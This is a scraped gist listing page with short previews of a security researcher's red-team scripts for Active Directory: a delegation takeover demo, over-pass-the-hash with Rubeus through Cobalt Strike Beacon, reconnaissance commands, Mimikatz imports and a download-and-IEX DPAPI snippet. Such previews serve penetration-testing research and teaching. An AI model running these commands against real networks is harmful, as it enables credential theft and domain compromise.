geeking out about Kerberos

Will HarmJ0y

HarmJ0y / rbcd_demo.ps1
Last active Sep 8, 2020
Resource-based constrained delegation computer DACL takeover demo
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
HarmJ0y / gist:dc379107cfb4aa7ef5c3ecbac0133a02
Last active Oct 15, 2020
Over-pass-the-hash with Rubeus and Beacon
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
HarmJ0y / cobaltstrike_sa.txt
Created Sep 28, 2018
Cobalt Strike Situational Awareness Commands
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
HarmJ0y / New-SYSVOLZip.ps1
Created Aug 8, 2017
Compresses all of SYSVOL to a local .zip file.
function New-SYSVOLZip {
<#
.SYNOPSIS

Compresses all folders/files in SYSVOL to a .zip file.

Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
View DPAPI.ps1
# load the assembly that exposes the DPAPI wrapper (System.Security.Cryptography.ProtectedData)
Add-Type -AssemblyName System.Security
# fetch the script text to protect (the URL is omitted in this preview)
$Content = (New-Object Net.Webclient).DownloadString('')
$Bytes = ([Text.Encoding]::ASCII).GetBytes($Content)
# DPAPI-encrypt the bytes with the LocalMachine scope, so only this machine can Unprotect() them
$EncryptedBytes = [Security.Cryptography.ProtectedData]::Protect($Bytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)
# round-trip: DPAPI-decrypt the blob back to text and invoke it
IEX (([Text.Encoding]::ASCII).GetString([Security.Cryptography.ProtectedData]::Unprotect($EncryptedBytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)))
HarmJ0y / PowerView-3.0-tricks.ps1
Last active Oct 26, 2020
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : 'find' specific data entries in a data set
View Get-NonstandardService.ps1
function Get-NonstandardService {
<#
.SYNOPSIS

Returns services where the associated binaries are either not signed, or are
signed by an issuer not matching 'Microsoft'.

Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
View powershell_talks.txt
BSides LV 2015 - "Building an Empire with PowerShell" -
BSides DC 2015 - "Bridging the Gap: Lessons in Adversarial Tradecraft" -
BSides DC 2015 - "** It, Do it Live (PowerShell Digital Forensics)" -
PowerShell Summit 2016 - "Digital Forensics with PowerShell" -
BSides LV 2016 - "Building an EmPyre with Python" -
DerbyCon 2016 - "A Year in the Empire" -
HarmJ0y / ConvertFrom-UserParameter.ps1
Last active Sep 16, 2019
function ConvertFrom-UserParameter {
<#
.SYNOPSIS

Converts a userParameters encoded blob into an ordered dictionary of decoded values.

Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
HarmJ0y / 44con_demo.ps1
Created Sep 17, 2016
Demo for the 44con "Trusts You Might Have Missed" presentation
# import PowerView and Invoke-Mimikatz
Import-Module .\powerview.ps1
Import-Module .\mimikatz.ps1
# map all reachable domain trusts
# enumerate groups with 'foreign' users, and convert the foreign principal SIDs to names
Find-ForeignGroup -Domain external.local
Find-ForeignGroup -Domain external.local | Select-Object -ExpandProperty UserName | Convert-SidToName